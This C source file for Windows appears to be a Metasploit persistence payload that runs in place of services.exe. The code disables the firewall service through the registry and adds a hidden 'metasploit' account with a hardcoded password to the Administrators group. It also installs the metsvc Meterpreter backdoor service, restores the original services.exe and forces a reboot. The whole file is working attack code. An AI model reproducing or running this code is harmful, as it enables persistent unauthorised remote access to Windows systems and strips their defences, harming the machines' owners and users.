#include #include #pragma comment(lib, "netapi32.lib") typedef BOOL (WINAPI *Wow64DisableWow64FsRedirectionFunc) ( __out PVOID *OldValue ); void start(){ //fix wow32-64 fsredir PVOID OldValue; Wow64DisableWow64FsRedirectionFunc disableWow = (Wow64DisableWow64FsRedirectionFunc)GetProcAddress( GetModuleHandleA("kernel32"),"Wow64DisableWow64FsRedirection"); if( disableWow ) disableWow(&OldValue); char windowsPath[MAX_PATH]; GetWindowsDirectoryA(windowsPath,MAX_PATH); SetCurrentDirectoryA(windowsPath); //turn off fw HKEY mkey; DWORD four = 4; RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\MpsSvc", 0,KEY_SET_VALUE|KEY_WOW64_64KEY,&mkey); RegSetValueExA(mkey,"Start",0,REG_DWORD,(PBYTE)&four,sizeof(DWORD)); RegCloseKey(mkey); //add user USER_INFO_1 userinfo; userinfo.usri1_name = L"metasploit"; userinfo.usri1_password = L"p@SSw0rd!123456"; userinfo.usri1_priv = USER_PRIV_USER; userinfo.usri1_home_dir = NULL; userinfo.usri1_comment = L""; userinfo.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD; userinfo.usri1_script_path = NULL; DWORD res = NetUserAdd(NULL,1,(PBYTE)&userinfo,NULL); if(res == NERR_Success){ LOCALGROUP_MEMBERS_INFO_3 lgmi3; lgmi3.lgrmi3_domainandname = userinfo.usri1_name; NetLocalGroupAddMembers(NULL,L"Administrators",3,(PBYTE)&lgmi3,1); } //start metsvc STARTUPINFOA strt; PROCESS_INFORMATION proci; for(int i = 0; i < sizeof(strt); i++) ((char*)&strt)[i]=0; for(int i = 0; i < sizeof(proci); i++) ((char*)&proci)[i]=0; if(CreateProcessA("System32\\metsvc.exe","metsvc.exe install-service",NULL, NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci) == 0 )//if 64 bit CreateProcessA("SysWOW64\\metsvc.exe","metsvc.exe install-service",NULL, NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci); //copy file back while(CopyFileA("System32\\services.bak.exe","System32\\services.exe",FALSE) == 0) Sleep(100); //reboot HANDLE tokenh; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&tokenh); TOKEN_PRIVILEGES tkp, otkp; DWORD oldsize; tkp.PrivilegeCount = 1; LookupPrivilegeValueA(NULL,"SeShutdownPrivilege",&(tkp.Privileges[0].Luid)); tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(tokenh,FALSE,&tkp,sizeof(tkp),&otkp,&oldsize); ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM | SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED); }